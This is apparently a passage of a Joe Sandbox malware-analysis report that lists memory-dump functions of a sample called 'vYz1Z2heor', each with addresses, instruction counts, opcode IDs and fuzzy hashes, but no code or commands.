                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7d6fa3cb7b218e32ab98ae91073a41e9d71f30b26f68457b202216717ad21efa
                                                              • Instruction ID: 6a7c82be321d2655471d9d3ed660d90086dc20f0a0a8b3dd9f3ae9aba41a4091
                                                              • Opcode Fuzzy Hash: 7d6fa3cb7b218e32ab98ae91073a41e9d71f30b26f68457b202216717ad21efa
                                                              • Instruction Fuzzy Hash: 10C092514A8AC00BCB0AAB6C0BA61D92F30FC8364879A04D6D184892E7AE8C82076322
                                                              Function 00C10986 Relevance: .0, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1839faa81c4683b89ce94f0fd9bde63e68771649e0fad2c0214711cac16e674a
                                                              • Instruction ID: f1a12ab5bd0f2adb003dc46c159b49299e0bb3b8378f23443e2e64611b6b3b99
                                                              • Opcode Fuzzy Hash: 1839faa81c4683b89ce94f0fd9bde63e68771649e0fad2c0214711cac16e674a
                                                              • Instruction Fuzzy Hash: 4EC01230415288CAFB20BBE9DD2A3B8BA11B786705F300036A18300A628E9488C6A613
                                                              Function 00C109A2 Relevance: .0, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b9bfa69da48d94fcdf1608efafaac61a779ebb4d229136ef6ce0c0f00ab85ad7
                                                              • Instruction ID: 368066d452d061cd1fe1714186c271049948aa4624ff20769b0e280aec014979
                                                              • Opcode Fuzzy Hash: b9bfa69da48d94fcdf1608efafaac61a779ebb4d229136ef6ce0c0f00ab85ad7
                                                              • Instruction Fuzzy Hash: 0FC08C30405288CBF720BBE9DD2A3BCBF10BB86700F300032A983006628ED488C7A213

                                                              Non-executed Functions

                                                              Function 00C15778 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V^m
                                                              • API String ID: 0-3751104571
                                                              • Opcode ID: b418c8bafc1aba37c344962097111e8b9ae08e7b30fe0dee86e5d6e35dbdd3b9
                                                              • Instruction ID: 535977b5821673c7ac6a2f0824238e1bbff3f4fd27fed6a5a55c04fcf143d6e6
                                                              • Opcode Fuzzy Hash: b418c8bafc1aba37c344962097111e8b9ae08e7b30fe0dee86e5d6e35dbdd3b9
                                                              • Instruction Fuzzy Hash: FB916D70E00709DFDF10CFA9C8817EDBBF2AF89314F248129E415AB294DB749986DB91
                                                              Function 05185D60 Relevance: .3, Instructions: 315COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3837220203.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5180000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8ed1efb3f00fcd3d994e195bb9d397324ad060e5a6547a379ddae92f4c6a1e54
                                                              • Instruction ID: b78bd2d15e4f74a8c79667342de129a954bf6a7d60727fd930f20d278210ed3d
                                                              • Opcode Fuzzy Hash: 8ed1efb3f00fcd3d994e195bb9d397324ad060e5a6547a379ddae92f4c6a1e54
                                                              • Instruction Fuzzy Hash: 0212C8F042A7458BE330DF65E84E2993FB1BB45328F924609E2656F2E5EFB4114ACF44
                                                              Function 0518C0F7 Relevance: .3, Instructions: 272COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3837220203.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5180000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8a9ac31024a827198d62452b56686294a5b2d88017bd6491bc6ef546a1c4156b
                                                              • Instruction ID: 8acedb0f2048edef80b6759432af329241349cf4aa9f28c6125e40e16485f3e6
                                                              • Opcode Fuzzy Hash: 8a9ac31024a827198d62452b56686294a5b2d88017bd6491bc6ef546a1c4156b
                                                              • Instruction Fuzzy Hash: 61D1EA35D2475A8ACB11EF64D990A99F7B1FF95300F10C79AE00937215EF70AAC9DB81
                                                              Function 0518C108 Relevance: .3, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3837220203.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5180000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e2ffb3d1b28b7c4cadf1bee880faf87cbf54531f337dee77cd453d849e80b583
                                                              • Instruction ID: d334ff1feb6a221cffd751f1e2012196bcf5a6e546f92c39b13c146d56f31379
                                                              • Opcode Fuzzy Hash: e2ffb3d1b28b7c4cadf1bee880faf87cbf54531f337dee77cd453d849e80b583
                                                              • Instruction Fuzzy Hash: 2AD1DA35C2475A8ADB10EF64D990A99F7B1FF95300F10C79AE00937215EF70AAC9DB81
                                                              Function 051805FF Relevance: .2, Instructions: 231COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3837220203.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5180000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cd8f693023a4ad0fd7e828e5835d8bcef987f3bff0b7c4103afc5551076b4342
                                                              • Instruction ID: 7d3b3355fef08bbd09538d152df48cdf6471a51a21ddb5b18119abac41158618
                                                              • Opcode Fuzzy Hash: cd8f693023a4ad0fd7e828e5835d8bcef987f3bff0b7c4103afc5551076b4342
                                                              • Instruction Fuzzy Hash: ABA10974A003189FDB04EFA0D950BAE7777EF88700F24811894066B7A9CB759D86EBA0
                                                              Function 05180600 Relevance: .2, Instructions: 231COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3837220203.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5180000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 61ec4cda09bbd9f43d4b30d7081f34885569fb29bc1642d0b5f62c8dc2f870bf
                                                              • Instruction ID: abd8121993401bd624afa4e8239cbfdcdd80a598174c58614253c2c49de5e6cd
                                                              • Opcode Fuzzy Hash: 61ec4cda09bbd9f43d4b30d7081f34885569fb29bc1642d0b5f62c8dc2f870bf
                                                              • Instruction Fuzzy Hash: 4FA10A74A003189FDB04EFA0D950FAE7777EF88700F14811894066B7A8CB759D86EBA0
                                                              Function 00C19750 Relevance: .1, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86df5ec8c6910072b9c5bab36aa0f0e848ba5e51015d8e95f0dddf6fcec939a1
                                                              • Instruction ID: 07e94fdcd03ef603fa1a2b5ab058a78faccb546b280da6e48c8599fd241c22b3
                                                              • Opcode Fuzzy Hash: 86df5ec8c6910072b9c5bab36aa0f0e848ba5e51015d8e95f0dddf6fcec939a1
                                                              • Instruction Fuzzy Hash: 8E518EA29083C04BE32ACBADB9413957FA36BEEA14F0981BD84404B65AD6755607CB42
                                                              Function 00C19760 Relevance: .1, Instructions: 76COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5682a196d1b2a47c2fbdab92f7140120fc33596e7aef33029f7b0db27a16396f
                                                              • Instruction ID: f945abc0f7cb00023158d8aaed050bee182c7fa21adcd4c036e8526f96a41f71
                                                              • Opcode Fuzzy Hash: 5682a196d1b2a47c2fbdab92f7140120fc33596e7aef33029f7b0db27a16396f
                                                              • Instruction Fuzzy Hash: 6B31F871E006448BE718DFAFAE0176ABFE3ABCC604F15C179C4089B278DAB015478B81